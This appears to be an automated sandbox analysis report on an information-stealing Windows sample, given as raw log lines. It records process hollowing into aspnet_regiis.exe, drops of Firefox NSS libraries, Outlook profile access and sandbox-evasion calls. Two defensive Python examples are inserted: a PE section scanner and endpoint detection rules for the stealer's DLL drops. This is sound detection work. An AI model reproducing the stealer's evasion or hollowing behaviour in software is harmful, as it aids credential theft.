                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wsock32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP | source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb | source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: freebl3.pdbp | source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: nss3.pdb@ | source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: softokn3.pdb@ | source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb | source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb | source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                        Source: Binary string: nss3.pdb | source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: mozglue.pdb | source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb | source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

                        Data Obfuscation

                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Unpacked PE file: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.750000.0.unpack A7B&<U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02766230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: section name: A7B&<U
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: section name: (empty)
                        Source: freebl3[1].dll.2.dr | Static PE information: section name: .00cfg
                        Source: mozglue.dll.2.dr | Static PE information: section name: .00cfg
                        Source: mozglue[1].dll.2.dr | Static PE information: section name: .00cfg
                        Source: msvcp140.dll.2.dr | Static PE information: section name: .didat
                        Source: msvcp140[1].dll.2.dr | Static PE information: section name: .didat
                        Source: nss3.dll.2.dr | Static PE information: section name: .00cfg
                        Source: nss3[1].dll.2.dr | Static PE information: section name: .00cfg
                        Source: softokn3.dll.2.dr | Static PE information: section name: .00cfg
                        Source: softokn3[1].dll.2.dr | Static PE information: section name: .00cfg
                        Source: freebl3.dll.2.dr | Static PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_0077AF75 push edi; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC2F06C pushad ; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC2F1D2 pushad ; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC35B94 push ecx; ret
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC53AB5 push ecx; ret
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_027676B5 push ecx; ret
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2DB536 push ecx; ret
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: section name: A7B&<U entropy: 7.998974089724877
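The three static traits the report reacts to in this block (a section name made of junk characters, a section with no name at all, a section at entropy 7.999, plus the EW section seen in the unpack comparison) are cheap to check in a triage pipeline before any sandbox run. The scanner below is an added example for this page, not code from Joe Sandbox or from the sample; it parses the PE section table with the standard library only, and the image it scans is constructed in memory with a section name modelled on the one in the report (a control character is assumed where the report's rendering lost it), so no sample file is needed.

```python
import hashlib
import math
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (PE/COFF specification)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

ENTROPY_THRESHOLD = 7.5  # bits per byte; compressed or encrypted payloads sit close to 8.0


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk the section table of a PE image held in memory; returns one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (size_of_optional,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        (characteristics,) = struct.unpack_from("<I", pe, off + 36)
        sections.append({
            "name": name.rstrip(b"\0"),
            "characteristics": characteristics,
            "raw": pe[raw_ptr:raw_ptr + raw_size],
        })
    return sections


def assess_sections(pe):
    """Flag nameless or junk-named sections, near-8.0 entropy, and writable+executable mappings."""
    findings = []
    for s in parse_sections(pe):
        name, flags = s["name"], []
        if not name:
            flags.append("nameless section")
        elif any(b < 0x21 or b > 0x7E for b in name):
            flags.append("non-printable characters in section name")
        entropy = shannon_entropy(s["raw"])
        if entropy > ENTROPY_THRESHOLD:
            flags.append("high entropy")
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            flags.append("writable and executable (EW)")
        findings.append({"name": name.decode("latin-1"), "entropy": round(entropy, 3), "flags": flags})
    return findings


def build_sample_pe():
    """Constructed PE32 image (not the analysed sample): a plain .text section, a section whose
    name contains a control character, and a nameless section full of pseudo-random bytes."""
    def section_header(name, raw_ptr, raw, characteristics):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), 0x1000 + raw_ptr, len(raw), raw_ptr,
                           0, 0, 0, 0, characteristics)

    text = b"\x55\x8b\xec\x83\xec\x10\x90\xc3" * 64          # 512 bytes, very repetitive
    junk = b"\x00" * 256
    packed = b"".join(hashlib.sha256(b"constructed-seed" + i.to_bytes(4, "little")).digest()
                      for i in range(256))                    # 8192 deterministic high-entropy bytes
    dos_header = struct.pack("<2s58xI", b"MZ", 64)           # e_lfanew = 64
    coff_header = struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 224, 0x0102)
    optional_header = struct.pack("<H", 0x10B) + b"\x00" * 222
    section_table = (
        section_header(b".text", 512, text, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
        + section_header(b"A7B&<U\x01", 1024, junk, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
        + section_header(b"", 1280, packed, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    )
    headers = dos_header + b"PE\0\0" + coff_header + optional_header + section_table
    headers += b"\x00" * (512 - len(headers))
    return headers + text + junk + packed


if __name__ == "__main__":
    for f in assess_sections(build_sample_pe()):
        print(f"{f['name']!r:12} entropy={f['entropy']:.3f} {', '.join(f['flags']) or 'ok'}")
```

Run assess_sections over the bytes of any real PE; a hit on "nameless section" or a junk name together with entropy above 7.5 is the same combination the report shows for the A7B&<U section, and the EW check catches the writable code section that the unpack comparison lists.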
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\freebl3.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | File created: C:\Users\user\AppData\Roaming\d3d9.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\softokn3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File created: C:\ProgramData\softokn3.dll
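Two behaviours in this report are good endpoint detections on their own: the hollowed host is a .NET Framework utility (aspnet_regiis.exe) launched from a user's Desktop with an empty command line, which legitimate tooling never does, and that host then downloads Firefox's NSS libraries (nss3.dll, softokn3.dll, freebl3.dll, mozglue.dll) into C:\ProgramData, where no Mozilla product installs them. The rules below are an added example written for this page, not Joe Sandbox or vendor detection content. They run over Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) records that are constructed inline to mirror the process tree and drops above; the field names follow Sysmon, and the allow-listed install directories and utility names are assumptions to tune for your estate.

```python
# Sysmon-style events: EventID 1 = process creation, EventID 11 = file creation.
NSS_DLLS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll"}
MOZILLA_INSTALL_DIRS = (
    "c:\\program files\\mozilla firefox\\",
    "c:\\program files (x86)\\mozilla firefox\\",
    "c:\\program files\\mozilla thunderbird\\",
    "c:\\program files (x86)\\mozilla thunderbird\\",
)
# .NET Framework utilities that are common hollowing hosts; aspnet_regiis.exe is the one used here.
DOTNET_UTILITIES = {"aspnet_regiis.exe", "aspnet_compiler.exe", "regasm.exe",
                    "regsvcs.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_nss_drop(ev):
    """NSS/mozglue DLL written anywhere except a Mozilla product install directory."""
    if ev["EventID"] != 11:
        return None
    target = ev["TargetFilename"]
    if basename(target) not in NSS_DLLS or target.lower().startswith(MOZILLA_INSTALL_DIRS):
        return None
    return "nss_library_dropped_outside_mozilla_install"


def rule_dotnet_utility_no_args(ev):
    """A .NET Framework utility started with an empty command line by a parent in a user-writable
    path. Started this way the utility does nothing useful, which is what a hollowing host looks like."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in DOTNET_UTILITIES:
        return None
    cmdline = ev["CommandLine"].strip().strip('"').lower()
    if cmdline != ev["Image"].lower():
        return None  # any argument at all: treat as legitimate tooling use
    if not ev["ParentImage"].lower().startswith(USER_WRITABLE_PREFIXES):
        return None
    return "dotnet_utility_launched_without_arguments_from_user_path"


RULES = (rule_nss_drop, rule_dotnet_utility_no_args)


def run_rules(events):
    """Return (event index, rule name) for every event that fires a rule."""
    alerts = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append((idx, hit))
    return alerts


ASPNET = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_regiis.exe"
LOADER = "C:\\Users\\user\\Desktop\\loader.exe"

# Constructed events modelled on the process tree and file drops in this report.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": LOADER, "CommandLine": f'"{LOADER}"', "ParentImage": "C:\\Windows\\explorer.exe"},
    {"EventID": 1, "Image": ASPNET, "CommandLine": f'"{ASPNET}"', "ParentImage": LOADER},
    {"EventID": 11, "Image": ASPNET, "TargetFilename": "C:\\ProgramData\\nss3.dll"},
    {"EventID": 11, "Image": ASPNET, "TargetFilename": "C:\\ProgramData\\softokn3.dll"},
    # benign: the Firefox installer writing its own NSS into the product directory
    {"EventID": 11, "Image": "C:\\Users\\user\\Downloads\\Firefox Setup.exe",
     "TargetFilename": "C:\\Program Files\\Mozilla Firefox\\nss3.dll"},
    # benign: an installer registering ASP.NET with real arguments
    {"EventID": 1, "Image": ASPNET, "CommandLine": f'"{ASPNET}" -i',
     "ParentImage": "C:\\Windows\\System32\\msiexec.exe"},
]

if __name__ == "__main__":
    for idx, name in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The no-arguments rule is deliberately narrow (empty command line and a user-writable parent) so that build servers and installers running these utilities with real switches stay quiet; widen USER_WRITABLE_PREFIXES if your loaders run from elsewhere. The NSS rule fires once per DLL, so a single host will typically produce four alerts in quick succession, which is itself a useful correlation signal.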
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02766230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match | File source: Process Memory Space: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe PID: 7520, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 28E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 2B00000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 2940000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 5140000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 6140000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 6270000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 7270000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 76C0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 86C0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Memory allocated: 96C0000 memory reserve | memory write watch
